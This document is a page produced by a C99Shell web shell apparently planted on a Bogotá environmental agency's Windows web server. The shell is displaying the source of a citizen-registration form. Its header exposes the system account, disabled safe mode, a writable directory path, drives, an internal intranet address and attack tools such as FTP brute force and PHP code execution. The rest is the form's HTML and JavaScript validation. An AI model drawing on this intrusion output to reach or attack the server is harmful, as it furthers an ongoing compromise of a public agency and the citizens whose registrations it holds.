!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

C:\AmbienteBogota\ambientebogota.gov.co\actores\Secretariaambiente\   drwxrwxrwx
Free 4.11 GB of 39.52 GB (10.39%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     registro_participacion_O_Lider.php (61.3 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">
<HTML>
<HEAD>
<TITLE>Secretaría Distrital de Ambiente</TITLE>
<META http-equiv=Content-Type content="text/html; charset=iso-8859-1">
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
<script type="text/javascript">
_uacct = "UA-1458662-7";
urchinTracker();
</script>
<script language="JavaScript">
function echeck(str) {

        var at="@"
        var dot="."
        var lat=str.indexOf(at)
        var lstr=str.length
        var ldot=str.indexOf(dot)
        if (str.indexOf(at)==-1){
           alert("El email no es valido")
           return false
        }

        if (str.indexOf(at)==-1 || str.indexOf(at)==0 || str.indexOf(at)==lstr){
           alert("El email no es valido")
           return false
        }

        if (str.indexOf(dot)==-1 || str.indexOf(dot)==0 || str.indexOf(dot)==lstr){
            alert("El email no es valido")
            return false
        }

         if (str.indexOf(at,(lat+1))!=-1){
            alert("El email no es valido")
            return false
         }

         if (str.substring(lat-1,lat)==dot || str.substring(lat+1,lat+2)==dot){
            alert("El email no es valido")
            return false
         }

         if (str.indexOf(dot,(lat+2))==-1){
            alert("El email no es valido")
            return false
         }
        
         if (str.indexOf(" ")!=-1){
            alert("El email no es valido")
            return false
         }

          return true                    
    }

function validar(){

if(document.registro.usuario.value==""){
alert("Por favor ingrese un nombre de usuario");
document.registro.usuario.focus();
document.registro.usuario.style.backgroundColor="yellow";
return false;
}
if(document.registro.pass.value==""){
alert("Por favor ingrese una contraseña");
document.registro.pass.focus();
document.registro.pass.style.backgroundColor="yellow";
return false;
}
var minLength = 6;
if (document.registro.pass.value.length < minLength) {
alert('Su contraseña debe tener como mínimo ' + minLength + ' caracteres.');
return false;
}


if(document.registro.pass2.value==""){
alert("Por favor ingrese una contraseña");
document.registro.pass2.focus();
document.registro.pass2.style.backgroundColor="yellow";
return false;
}
if(document.registro.pass2.value!=document.registro.pass.value){
alert("Los valores de las contraseñas no coinciden");
document.registro.pass.focus();
document.registro.pass.style.backgroundColor="yellow";
return false;
}
if(document.registro.identi.value==""){
alert("Por favor ingrese la identificación NIT o cédula");
document.registro.identi.focus();
document.registro.identi.style.backgroundColor="yellow";
return false;
}

if(document.registro.acronimo.value==""){
alert("Por favor ingrese la sigla de la organizacion");
document.registro.acronimo.focus();
document.registro.acronimo.style.backgroundColor="yellow";
return false;
}
if(document.registro.nombre.value==""){
alert("Por favor ingrese el nombre de la organizacion");
document.registro.nombre.focus();
document.registro.nombre.style.backgroundColor="yellow";
return false;
}
if(document.registro.direccion.value==""){
alert("Por favor ingrese su direccion");
document.registro.direccion.focus();
document.registro.direccion.style.backgroundColor="yellow";
return false;
}
if(document.registro.localidad.value==0)

alert("Seleccione una localidad");
document.registro.localidad.focus();
return false;
 }

if(document.registro.territorio.value==""){
alert("Por favor ingrese el territorio");
document.registro.territorio.focus();
document.registro.territorio.style.backgroundColor="yellow";
return false;
}


if(document.registro.telefono.value==""){
alert("Por favor ingrese su numero telefonico");
document.registro.telefono.focus();
document.registro.telefono.style.backgroundColor="yellow";
return false;
}

if (isNaN(parseInt(document.registro.telefono.value))) {
   alert("Ingrese solo numeros en este campo");
document.registro.telefono.focus();
document.registro.telefono.style.backgroundColor="yellow";
return false;
}


var emailID=document.registro.email
    
    if ((emailID.value==null)||(emailID.value=="")){
        alert("Ingrese el email de la organizacion")
        emailID.focus()
        return false
    }
    if (echeck(emailID.value)==false){
        emailID.value=""
        emailID.focus()
        return false
    }



if(document.registro.aniocreacion.value==""){
alert("Por favor ingrese la fecha de creacion");
document.registro.aniocreacion.focus();
document.registro.aniocreacion.style.backgroundColor="yellow";
return false;
}
if (isNaN(parseInt(document.registro.aniocreacion.value))) {
   alert("Ingrese solo numeros en este campo");
document.registro.aniocreacion.focus();
document.registro.aniocreacion.style.backgroundColor="yellow";
return false;
}
/*
if(document.registro.nombre1.value==""){
alert("Por favor ingrese su nombre");
document.registro.nombre1.focus();
document.registro.nombre1.style.backgroundColor="yellow";
return false;
}

if(document.registro.apellido.value==""){
alert("Por favor ingrese su apellido");
document.registro.apellido.focus();
document.registro.apellido.style.backgroundColor="yellow";
return false;
}

if(document.registro.funcion.value==""){
alert("Por favor ingrese su funcion");
document.registro.funcion.focus();
document.registro.funcion.style.backgroundColor="yellow";
return false;
}

if(document.registro.email2.value==""){
alert("Por favor ingrese su email");
document.registro.email2.focus();
document.registro.email2.style.backgroundColor="yellow";
return false;
}



var emailID2=document.registro.email2
    
    if ((emailID2.value==null)||(emailID2.value=="")){
        alert("Ingrese el email de la organizacion")
        emailID2.focus()
        return false
    }
    if (echeck(emailID2.value)==false){
        emailID2.value=""
        emailID2.focus()
        return false
    }


if(document.registro.cargo.value==""){
alert("Por favor ingrese su cargo");
document.registro.cargo.focus();
document.registro.cargo.style.backgroundColor="yellow";
return false;
}
*/
if(document.registro.organizacion.value==0)

alert("Seleccione una organizacion");
document.registro.organizacion.focus();
return false;
 }

if(document.registro.localidad.value==0)

alert("Seleccione una localidad");
document.registro.localidad.focus();
return false;
 }

//if (!( document.registro.temas[0].checked||document.registro.temas[1].checked||document.registro.temas[2].checked||document.registro.temas[3].checked ||document.registro.temas[4].checked||document.registro.temas[5].checked||document.registro.temas[6].checked||document.registro.temas[7].checked||document.registro.temas[8].checked||document.registro.temas[9].checked||document.registro.temas[10].checked||document.registro.temas[11].checked||document.registro.temas[12].checked||document.registro.temas[13].checked))

if ( ( document.registro.temas[0].checked == false) && ( document.registro.temas[1].checked == false  ) &&( document.registro.temas[2].checked == false  )&& ( document.registro.temas[3].checked == false  )&& ( document.registro.temas[4].checked == false  )&& ( document.registro.temas[5].checked == false  )&& ( document.registro.temas[6].checked == false  )&& ( document.registro.temas[7].checked == false  )&& ( document.registro.temas[8].checked == false)&& ( document.registro.temas[9].checked == false)&& ( document.registro.temas[10].checked == false)&& ( document.registro.temas[11].checked == false)&& ( document.registro.temas[12].checked == false)&& ( document.registro.temas[13].checked == false))

{
alert ( "Seleccione los temas" );
document.registro.temas[0].focus();
return false;
    
}


if ( ( document.registro.temas_14.checked == true ) && (document.registro.otros_temas.value==""))
{
 alert("Ingrese otro tema");
document.registro.otros_temas.focus();

return false;
 }

//if (!( document.registro.actividades[0].checked||document.registro.actividades[1].checked||document.registro.actividades[2].checked||document.registro.actividades[3].checked ||document.registro.actividades[4].checked||document.registro.actividades[5].checked||document.registro.actividades[6].checked||document.registro.actividades[7].checked||document.registro.actividades[8].checked))

//if ( ( document.registro.actividades[0].checked == false )&&( document.registro.actividades[1].checked == false  )&& ( document.registro.actividades[2].checked == false  )&& ( document.registro.actividades[3].checked == false  )&& ( document.registro.actividades[4].checked == false  )&& ( document.registro.actividades[5].checked == false  )&& ( document.registro.actividades[6].checked == false  )&& ( document.registro.actividades[7].checked == false  )&& ( document.registro.actividades[8].checked == false  ))
if ((document.registro.actividades[0].checked == false) && ( document.registro.actividades[1].checked == false  ) && ( document.registro.actividades[2].checked == false  )&& ( document.registro.actividades[3].checked == false  )&& ( document.registro.actividades[4].checked == false  )&& ( document.registro.actividades[5].checked == false  )&& ( document.registro.actividades[6].checked == false  )&& ( document.registro.actividades[7].checked == false  )&& ( document.registro.actividades[8].checked == false))
{
alert ( "Seleccione las actividades" );
document.registro.actividades[0].focus();
return false;
    
    }

if ( ( document.registro.actividades[7].checked == true ) && (document.registro.otros_actividades.value==""))
{ alert("Ingrese otras actividades");
document.registro.otros_actividades.focus();

return false;
 }

/*if(document.registro.organizaciones_integradas.value=="")

alert("Ingrese las organizaciones integradas a la red");
document.registro.organizaciones_integradas.focus();
return false;
 }
 */


if ( ( document.registro.financiamientos[0].checked == false )&& ( document.registro.financiamientos[1].checked == false  )&& ( document.registro.financiamientos[2].checked == false  )&& ( document.registro.financiamientos[3].checked == false  )&& ( document.registro.financiamientos[4].checked == false  )&& ( document.registro.financiamientos[5].checked == false  )&& ( document.registro.financiamientos[6].checked == false  )&& ( document.registro.financiamientos[7].checked == false  )&& ( document.registro.financiamientos[8].checked == false  )&& ( document.registro.financiamientos[9].checked == false  )&& ( document.registro.financiamientos[10].checked == false  ))
    {
        alert ( "Seleccione los esquemas de financiamiento" );
        document.registro.financiamientos[0].focus();
        return false;
    
    }

if ( ( document.registro.financiamientos[9].checked == true ) && (document.registro.otros_financiamientos.value==""))
{ alert("Ingrese otros financiamientos");
document.registro.otros_financiamientos.focus();

return false;
 }



if ( ( document.registro.material[0].checked == false )&& ( document.registro.material[1].checked == false  )&& ( document.registro.material[2].checked == false  )&& ( document.registro.material[3].checked == false  )&& ( document.registro.material[4].checked == false  )&& ( document.registro.material[5].checked == false  )&& ( document.registro.material[6].checked == false  )&& ( document.registro.material[7].checked == false  ))
    {
        alert ( "Seleccione los tipos de materiales producidos" );
        document.registro.material[0].focus();
        return false;
    
    }
if ( ( document.registro.material[7].checked == true ) && (document.registro.materiales.value==""))
{ alert("Ingrese otros materiales");
document.registro.otros_materiales.focus();

return false;
 }

if(document.registro.mision.value==""){
alert("Por favor ingrese la mision de la organizacion");
document.registro.mision.focus();
document.registro.mision.style.backgroundColor="yellow";
return false;
}

if(document.registro.vision.value==""){
alert("Por favor ingrese la vision de la organizacion");
document.registro.vision.focus();
document.registro.vision.style.backgroundColor="yellow";
return false;
}

    if  ( document.registro.verif_box.value == "" )
    {
        alert ( "Ingrese el codigo de verificacion" );
        document.registro.verif_box.focus();
        document.registro.verif_box.style.backgroundColor="yellow";
    return false;
    
    }

return true;
}


function habilitar1()
{
  var form = document.registro;
   form.otros_temas.disabled = false;
}

function habilitar2()
{
  var form = document.registro;
   form.otros_actividades.disabled = false;
}
function habilitar3()
{
  var form = document.registro;
   form.otros_financiamientos.disabled = false;
}
function habilitar4()
{
  var form = document.registro;
   form.otros_materiales.disabled = false;
}

</script>


<style type="text/css">
body{ margin:0px; background-color:#EFEEEA;}
a{ text-decoration:none}
a:hover{ text-decoration:underline}
fieldset { -moz-border-radius: 8px; border-radius: px;  }
.fuente{ font-family:verdana, Helvetica, sans-serif; font-size:11px; color:#666666; font-weight:normal; padding:4px}
.blanco {
    font-family: Verdana, Arial, Helvetica, sans-serif;
    font-size: 12px;
    font-weight: bolder;
    color: #FFFFFF;
    background-color: #999999;
}
a{ color:#006699;}
a.fuentewhite{
    font-family: Verdana, Arial, Helvetica, sans-serif;
    font-size: 11px;
        color: #FFFFFF; text-decoration:none; padding-left:5px; padding-right:5px;
}
a.fuentewhite:hover{
    font-family: Verdana, Arial, Helvetica, sans-serif;
    font-size: 11px;
        color: #FFFFcc; text-decoration:underline; padding-left:5px
}
#caja {font-family: verdana, arial; font-size:11px; border:1px solid #999999}
.amarillo{background-image:url(images/yell.jpg); background-repeat:repeat-x}
.style1 {color: #FFFFFF}
.negra1{font-family: verdana, arial; font-size:11px}
fieldset{border: 1px solid  #ccc;}
-->
</style>
<link rel="stylesheet" type="text/css" href="/sda/libreria/css/tabcontent.css" />
</HEAD>
<BODY>
<table border="0" cellpadding="0" cellspacing="0" align="center" width="928"><tr><td width="14" style="background-image:url(/sda/libreria/jpg/new/fondoleft.jpg); background-repeat:repeat-y"></td>
<td><TABLE width="900" border=0 align="center" cellPadding=0 cellSpacing=0>
        <TBODY>
             <TR>
            <TD bgColor=#7DB5C6 style="background-image:url(/sda/libreria/jpg/top08.jpg); background-repeat:no-repeat;" width="900" height="90" valign="bottom"><div align="right"><A href="/" class="fuentewhite">Inicio</A> 
                | <A href="http://www.secretariadeambiente.gov.co/sda/libreria/php/decide.php?patron=00.01" class="fuentewhite">Mapa 
                del Sitio</A> | <A href="http://192.168.10.3/php/reqintranet.php" class="fuentewhite">Intranet 
                SDA</A></div></TD>
          </TR>
          <TR>
            <TD align=left vAlign=top bgColor=#000000><TABLE cellSpacing=0 cellPadding=0 width="100%" border=0>
                <TBODY>
                  <TR> 
                    <TD width="73%" bgColor=#669966 background="http://www.secretariadeambiente.gov.co/sda/libreria/jpg/new/bg2.gif"><img src="http://www.secretariadeambiente.gov.co/sda/libreria/gif/bar2.gif" width="518" height="30" border="0" usemap="#Map"></TD>
                    <form name="form1" method="post" action="http://www.secretariadeambiente.gov.co/sda/libreria/php/frame_buscar.php">
                      <TD width="27%" bgColor=#669966  background="http://www.secretariadeambiente.gov.co/sda/libreria/jpg/new/bg2.gif"> 
                        <input name="buscar" type="text" size="20" id="caja"> 
                        <input type="submit" name="Submit" value="Buscar" style="font-size:10px"> 
                        <input name="accion" type="hidden" id="accion" value="1"></TD>
                    </form>
                  </TR>
                  <TR>
                    <TD colspan="2" bgColor=#FFFFFF><table width="900" border="0" cellpadding="0" cellspacing="0">
                        <tr> 
                          <td width="195" valign="top" bgcolor="#F7F7F7"><?php include("../../php/leftmenu2.php"); ?></td>
                          <td width="705" valign="top"><table width="100%" border="0" align="center" cellpadding="3" cellspacing="0" class="fuente" style="padding:3px;">
                              <tr> 
                                <td height="45" align="left" valign="top"> <fieldset>
                                  <legend><font color="#990000"><strong><font size="2" face="Geneva, Arial">Oficina OPEL</font></strong></font></legend>
                                  <br>
                                <!-- <div align="right"><a href="javascript:void(0);" onClick="history.back();">&laquo;Regresar </a></div> -->
                                <div align="right"><a href="registro_participacion_organizaciones_por_organizacion.php">Regresar</a></div>
                                  <font color="#006699" size="4"><strong>Registro 
                                  de organizaciones</strong></font><br>
                                  <div style="padding:4px;">(*) Campos requeridos<br>
                                  <div style="padding:4px;"><strong>Persona Natural</strong><br>
                                    <form name="registro" onSubmit="return validar();"  method="POST" action="recibe_Lider.php">
 <input type="hidden" value="<?php echo date("Y-m-j");?>" name="fecha" />
                                      <input type="hidden" value="0" name="estado" />
                                      <input type="hidden" value="organizaciones" name="group1" />
                                      <input type="hidden" value="/sda/libreria/actores/Secretariaambiente/registro_experiencias.php" name="url1" />
                                      <br>
                                      <br>
                                      <fieldset>
                                      <legend><strong><font color="#003333">Informaci&oacute;n 
                                      para Acceder al Sistema</font></strong></legend>
                                      <br>
                                      <table width="100%" border="0" cellspacing="0" cellpadding="2" style="font-size:11px">
                                        <tr>
                                          <td align="right">*Nombre de usuario</td>
                                          <td><input name="usuario" type="text" id="usuario" maxlength="15"></td>
                                          <td colspan="2" align="left">&nbsp;</td>
                                        </tr>
                                        <tr> 
                                          <td align="right">*Contrase&ntilde;a</td>
                                          <td><input name="pass" type="password" id="pass" maxlength="10"></td>
                                          <td colspan="2" align="left">*Confirmar 
                                            contrase&ntilde;a 
                                            <input name="pass2" type="password"  id="pass2" maxlength="10"></td>
                                        </tr>
                                        </table>
</fieldset>
<BR><BR>
<fieldset>
                                    <legend><strong><font color="#003333">Informaci&oacute;n General Persona Natural</font></strong></legend>
                                    <BR>
                                    <table width="100%" border="0" cellspacing="0" cellpadding="2" style="font-size:11px">
                                        <tr> 
                                          <td align="right"><strong>*</strong>NIT 
                                            o c&eacute;dula</td>
                                          <td>
<input name="identi" type="text" id="identi2"></td>
                                          <td colspan="2" align="left">&nbsp;</td>
                                        </tr>
                                       <tr> 
                                          <!-- <td align="right"><strong>*</strong>Sigla</td>
                                          <td> 
<input name="acronimo" type="text" id="acronimo2"> </td> 
                                          <td colspan="2" align="left">&nbsp;</td> -->
                                        </tr> 
                                        <tr> 
                                          <td width="133" align="right">*Nombre completo</td>
                                          <td width="191"><input name="nombre" type="text" id="nombre"></td>
                                          <td align="right">*Tel&eacute;fono </td>
                                          <td><input name="telefono" type="text" id="telefono2"></td>
                                        </tr>
                                        <tr> 
                                          <td align="right">*Direcci&oacute;n</td>
                                          <td><input name="direccion" type="text" id="direccion"></td>
                                          <td width="127" align="right">Fax</td>
                                          <td width="224"><input name="fax" type="text" id="fax"></td>
                                        </tr>
                                        <tr> 
                                          <td align="right">*Localidad</td>
                                          <td>


<script language="JavaScript">

 function setOptions(selbox, chosen) {
var selbox = selbox;
 
selbox.options.length = 0;
if (chosen == "0") {
  selbox.options[selbox.options.length] = new Option('Seleccione una localidad',' ');
 
}
if (chosen == "Usaquen") {
  selbox.options[selbox.options.length] = new Option('CERROS ORIENTALES','CERROS ORIENTALES');
  selbox.options[selbox.options.length] = new Option('BORDE NORTE','BORDE NORTE');
  selbox.options[selbox.options.length] = new Option('RIO SALITRE','RIO SALITRE');
  selbox.options[selbox.options.length] = new Option('HUMEDALES','HUMEDALES');
  selbox.options[selbox.options.length] = new Option('PARAMOS Y RURALIDAD','PARAMOS Y RURALIDAD');
}
if (chosen == "Chapinero") {
  selbox.options[selbox.options.length] = new Option('CERROS ORIENTALES','CERROS ORIENTALES ');
  selbox.options[selbox.options.length] = new Option('RIO SALITRE','RIO SALITRE');
 selbox.options[selbox.options.length] = new Option('PARAMOS Y RURALIDAD','PARAMOS Y RURALIDAD');
}
if (chosen == "Santa fe") {
  selbox.options[selbox.options.length] = new Option('CERROS ORIENTALES','CERROS ORIENTALES');
  selbox.options[selbox.options.length] = new Option('RIO SALITRE','RIO SALITRE');
  selbox.options[selbox.options.length] = new Option('RIO FUCHA','RIO FUCHA');
  selbox.options[selbox.options.length] = new Option('PARAMOS Y RURALIDAD','PARAMOS Y RURALIDAD');
}
if (chosen == "San Cristobal") {
  selbox.options[selbox.options.length] = new Option('CERROS ORIENTALES','CERROS ORIENTALES');
  selbox.options[selbox.options.length] = new Option('RIO FUCHA','RIO FUCHA');
  selbox.options[selbox.options.length] = new Option('RIO TUNJUELO','RIO TUNJUELO');
    selbox.options[selbox.options.length] = new Option('RIO BOGOTÁ','RIO BOGOTA');
  selbox.options[selbox.options.length] = new Option('PARAMOS Y RURALIDAD','PARAMOS Y RURALIDAD');
}
if (chosen == "Usme") {
  selbox.options[selbox.options.length] = new Option('CERROS ORIENTALES','CERROS ORIENTALES');
 selbox.options[selbox.options.length] = new Option('PARAMOS Y RURALIDAD','PARAMOS Y RURALIDAD');
  selbox.options[selbox.options.length] = new Option('RIO TUNJUELO','RIO TUNJUELO');
    selbox.options[selbox.options.length] = new Option('RIO BOGOTÁ','RIO BOGOTA');
  
}

if (chosen == "Tunjuelito") {
  selbox.options[selbox.options.length] = new Option('RIO TUNJUELO','RIO TUNJUELO');
    selbox.options[selbox.options.length] = new Option('RIO BOGOTÁ','RIO BOGOTA');
}
if (chosen == "Bosa") {
  selbox.options[selbox.options.length] = new Option('RIO BOGOTÁ','RIO BOGOTA');
 selbox.options[selbox.options.length] = new Option('HUMEDALES','HUMEDALES');
  selbox.options[selbox.options.length] = new Option('RIO TUNJUELO','RIO TUNJUELO');
}
if (chosen == "Kennedy") {
  selbox.options[selbox.options.length] = new Option('RIO TUNJUELO','RIO TUNJUELO');
  selbox.options[selbox.options.length] = new Option('RIO FUCHA','RIO FUCHA');
  selbox.options[selbox.options.length] = new Option('RIO BOGOTÁ','RIO BOGOTA');
 selbox.options[selbox.options.length] = new Option('HUMEDALES','HUMEDALES');
}
if (chosen == "Fontibon") {
  selbox.options[selbox.options.length] = new Option('RIO BOGOTÁ','RIO BOGOTA');
   selbox.options[selbox.options.length] = new Option('HUMEDALES','HUMEDALES');
selbox.options[selbox.options.length] = new Option('RIO FUCHA','RIO FUCHA');
}
if (chosen == "Engativa") {
  selbox.options[selbox.options.length] = new Option('RIO BOGOTÁ','RIO BOGOTA');
   selbox.options[selbox.options.length] = new Option('HUMEDALES','HUMEDALES');
 selbox.options[selbox.options.length] = new Option('RIO SALITRE','RIO SALITRE');
}
if (chosen == "Suba") {
  selbox.options[selbox.options.length] = new Option('RIO BOGOTÁ','RIO BOGOTA');
selbox.options[selbox.options.length] = new Option('BORDE NORTE','BORDE NORTE');
selbox.options[selbox.options.length] = new Option('PARAMOS Y RURALIDAD','PARAMOS Y RURALIDAD');
   selbox.options[selbox.options.length] = new Option('HUMEDALES','HUMEDALES');
 selbox.options[selbox.options.length] = new Option('RIO SALITRE','RIO SALITRE');
}
if (chosen == "Barrios unidos") {
 selbox.options[selbox.options.length] = new Option('RIO SALITRE','RIO SALITRE');
}
if (chosen == "Teusaquillo") {
 selbox.options[selbox.options.length] = new Option('RIO SALITRE','RIO SALITRE');
selbox.options[selbox.options.length] = new Option('RIO FUCHA','RIO FUCHA');
}
if (chosen == "Martires") {
selbox.options[selbox.options.length] = new Option('RIO FUCHA','RIO FUCHA');
}
if (chosen == "Antonio narino") {
selbox.options[selbox.options.length] = new Option('RIO BOGOTÁ','RIO BOGOTA');
selbox.options[selbox.options.length] = new Option('RIO FUCHA','RIO FUCHA');
}
if (chosen == "Puente aranda") {
selbox.options[selbox.options.length] = new Option('RIO BOGOTÁ','RIO BOGOTA');
selbox.options[selbox.options.length] = new Option('RIO FUCHA','RIO FUCHA');
}
if (chosen == "Candelaria") {
selbox.options[selbox.options.length] = new Option('CERROS ORIENTALES','CERROS ORIENTALES');
selbox.options[selbox.options.length] = new Option('RIO FUCHA','RIO FUCHA');
}
if (chosen == "Rafael uribe uribe") {
selbox.options[selbox.options.length] = new Option('RIO FUCHA','RIO FUCHA');
selbox.options[selbox.options.length] = new Option('RIO TUNJUELO','RIO TUNJUELO');
}
if (chosen == "Ciudad bolivar") {
selbox.options[selbox.options.length] = new Option('RIO TUNJUELO','RIO TUNJUELO');
}
if (chosen == "Sumapaz") {
selbox.options[selbox.options.length] = new Option('PARAMOS Y RURALIDAD','PARAMOS Y RURALIDAD');
selbox.options[selbox.options.length] = new Option('RIO TUNJUELO','RIO TUNJUELO');
}
}

</script>

<select name="localidad" size="1" id="localidad"  style="font-size:11px" onchange="setOptions(document.registro.territorio,document.registro.localidad.options[document.registro.localidad.selectedIndex].value);">
                                              <option value="0" selected>Seleccione</option>
                                              <option value="Usaquen">Usaquén 
                                              <option value="Chapinero">Chapinero</option>
                                              <option value="Santa fe">Santa fe</option>
                                              <option value="San Cristobal">San Cristobal</option>
                                              <option value="Usme">Usme</option>
                                              <option value="Tunjuelito">Tunjuelito</option>
                                              <option value="Bosa">Bosa</option>
                                              <option value="Kennedy">Kennedy</option>
                                              <option value="Fontibon">Fontibon</option>
                                              <option value="Engativa">Engativa</option>
                                              <option value="Suba">Suba</option>
                                              <option value="Barrios unidos">Barrios 
                                              unidos</option>
                                              <option value="Teusaquillo">Teusaquillo</option>
                                              <option value="Martires">Martires</option>
                                              <option value="Antonio Narino">Antonio 
                                              nariño</option>
                                              <option value="Puente aranda">Puente 
                                              aranda</option>
                                              <option value="Candelaria">Candelaria</option>
                                              <option value="Rafael uribe uribe">Rafael 
                                              uribe uribe</option>
                                              <option value="Ciudad bolivar">Ciudad 
                                              bolivar</option>
                                              <option value="Sumapaz">Sumapaz</option>
                                            </select></td>
                                          <td align="right">*E-mail</td>
                                          <td><input name="email" type="text" id="email"></td>
                                        </tr>
                                        <tr> 
                                          <td align="right">*Territorio</td>
                                          <td>

<select name="territorio" size="1" id="territorio" style="font-size:11px">
<option value="0" selected="selected">Seleccione una localidad arriba</option>
</select><br>

</td>
                                          <td align="right"><strong>*</strong>Comit&eacute;</td>
                                          <td align="left">
                                           <select name="sitiowebA" size="1" id="sitiowebA" style="font-size:11px">
                                           <option value="Ninguno" selected="selected">Comit&eacute;</option>
                                           <option value="CLOPS">CLOPS</option>
                                           <option value="CLE">CLE</option>
                                           <option value="CLEA">CLEA</option>
                                           <option value="CAL">CAL</option>
                                           <option value="CIDEA">CIDEA</option>
                                           <option value="PROCEDAS">PROCEDAS</option>
                                           </select>
                                           <select name="sitiowebB" size="1" id="sitiowebB"  style="font-size:11px">
                                              <option value="Ninguno" selected>Localidad</option>
                                              <option value="Usaquen">Usaquén 
                                              <option value="Chapinero">Chapinero</option>
                                              <option value="Santa fe">Santa fe</option>
                                              <option value="San Cristobal">San Cristobal</option>
                                              <option value="Usme">Usme</option>
                                              <option value="Tunjuelito">Tunjuelito</option>
                                              <option value="Bosa">Bosa</option>
                                              <option value="Kennedy">Kennedy</option>
                                              <option value="Fontibon">Fontibon</option>
                                              <option value="Engativa">Engativa</option>
                                              <option value="Suba">Suba</option>
                                              <option value="Barrios Unidos">Barrios unidos</option>
                                              <option value="Teusaquillo">Teusaquillo</option>
                                              <option value="Martires">Martires</option>
                                              <option value="Antonio Narino">Antonio 
                                              nari&ntilde;o</option>
                                              <option value="Puente aranda">Puente 
                                              aranda</option>
                                              <option value="Candelaria">Candelaria</option>
                                              <option value="Rafael Uribe Uribe">Rafael 
                                              uribe uribe</option>
                                              <option value="Ciudad Bolivar">Ciudad 
                                              bolivar</option>
                                              <option value="Sumapaz">Sumapaz</option>
                                            </select></td>
                                          <!-- <td align="right">Sitio internet</td> -->
                                          <!-- <td><input name="sitioweb" type="text" id="sitioweb"></td> -->
                                        </tr>
                                        <tr> 
                                          <!-- <td align="right">*A&ntilde;o de creaci&oacute;n</td> -->
                                          <td><input name="aniocreacion" type="hidden" id="aniocreacion2" size="10" maxlength="4" value="0000"></td>
                                          <td align="right">&nbsp;</td>
                                          <td>&nbsp;</td>
                                        </tr>
                                      </table>
</fieldset> 
<!-- <fieldset>
                                      <legend><strong><font color="#000000">Persona 
                                      de contacto</font></strong></legend>
                                      <br> -->
                                      <table width="100%" border="0" cellspacing="0" cellpadding="2" style="font-size:11px">
                                        <tr> 
                                        <!--  <td width="98" align="right">*Nombre</td> -->
                                          <td width="228">  <input name="nombre1" type="hidden" id="nombre1"> </td>
                                        <!--  <td width="68" align="right">*E-mail</td> -->
                                          <td width="281">  <input name="email2" type="hidden" id="email2"> </td>
                                        </tr>
                                        <tr> 
                                        <!-- <td align="right">*Apellido</td> -->
                                          <td>  <input name="apellido" type="hidden" id="nombre13"> </td>
                                        <!-- <td align="right">*Cargo</td> -->
                                          <td>  <input name="cargo" type="hidden" id="cargo"> </td>
                                        </tr>
                                        <tr> 
                                        <!-- <td align="right">*Funci&oacute;n</td> -->
                                          <td><input name="funcion" type="hidden" id="nombre14"> </td>
                                        <!-- <td>&nbsp;</td>
                                          <td>&nbsp;</td> -->
                                        </tr>
                                        <tr> 
                                        <!-- <td align="right">Comentarios</td> 
                                          <td>  <textarea name="comentarios" type="hidden" id="nombre15"></textarea> </td>
                                          <td>&nbsp;</td>
                                          <td>&nbsp;</td> -->
                                        </tr>
                                      </table>
<!-- </fieldset>  -->
<br>
<br>

                <!--
<fieldset>
                                      <legend><strong>
                                      <font color="#000000">Otros datos</font></strong></legend>
                                      <br>-->
                                      <table width="100%" border="0" cellspacing="0" cellpadding="2" style="font-size:11px">
                                        <tr>
                
                <input type="hidden" name="organizacion"  value="persona_natural" id="organizacion"> 
                <!--
                                          <td align="right">*Tipo de organizaci&oacute;n</td>
                                          <td><select size="1" name="organizacion"  style="font-size:11px">
                                              <option value="0" selected>Seleccione</option>
                                              <option value="instituto_investigacion">Instituto 
                                              de Investigaci&oacute;n</option>
                                              <option value="organizacion_no_gubernamental">Organizaci&oacute;n 
                                              No Gubernamental</option>
                                              <option value="organizacion_social_comunitaria">Organizaci&oacute;n 
                                              Social Comunitaria</option>
                                              <option value="instancia_participacion">Instancia 
                                              de Participaci&oacute;n</option>
                                              <option value="organizacion_internacional">Organizaci&oacute;n 
                                              Internacional</option>
                                              <option value="organizacion_publica">Organizaci&oacute;n 
                                              Publica</option>
                                              <option value="universidad">Universidad</option>
                                              <option value="empresa_privada">Empresa 
                                              Privada</option>
                                              <option value="grupo_ciudadanos">Grupo 
                                              de Ciudadanos</option>
                                               <option value="red_ambiental">Red ambiental</option>
                                               <option value="religiosas_confesionales">Organizaciones religiosas o confesionales</option>
                                            </select></td>
                                        </tr> 
                                        
                                        <tr> 
                                        <br>
                                          <td align="right">*Tipos de actor</td>
                                          <td><table width="100%" border="0" cellspacing="0" cellpadding="3" style="font-size:11px">
                                              <tr> 
                                                <td width="49%"> --> <input type="hidden" name="tipos[]"  value="N/A" id="tipos"> <!--
                                                  Lider ciudadano</td>
                                                <td><input type="checkbox" name="tipos[]"  value="instituto_de_educacion_jardin_infantil" id="tipos">
                                                  Instituto de educaci&oacute;n jard&iacute;n infantil </td>
                                              </tr>
                                              <tr>
                                                <td width="51%"><input type="checkbox" name="tipos[]"  value="Grupo_de_ciudadanos" id="tipos">
                                                  Grupo de ciudadanos </td>
                                                <td><input type="checkbox" name="tipos[]"  value="instituto_de_educacion_basica" id="tipos">
                                                  Instituto de educaci&oacute;n b&aacute;sica </td>
                                              </tr>
                                              <tr>
                                                <td><input type="checkbox" name="tipos[]"  value="instituto_de_investigación" id="tipos">
                                                  Instituto de investigaci&oacute;n </td>
                                                <td><input type="checkbox" name="tipos[]"  value="instituto_de_educacion_media" id="tipos">
                                                  Instituto de educaci&oacute;n media </td>
                                                
                                              </tr>
                                              <tr> 
                                                <td><input type="checkbox" name="tipos[]"  value="organizacion_no_gubernamental" id="tipos">
                                                  Organizaci&oacute;n no gubernamental</td>
                                                <td><input type="checkbox" name="tipos[]"  value="instituto_de_educacion_tecnica" id="tipos">
                                                  Instituto de educaci&oacute;n t&eacute;cnica </td>
                                              </tr>
                                              <tr>
                                                <td><input type="checkbox" name="tipos[]"  value="empresa_privada" id="tipos">
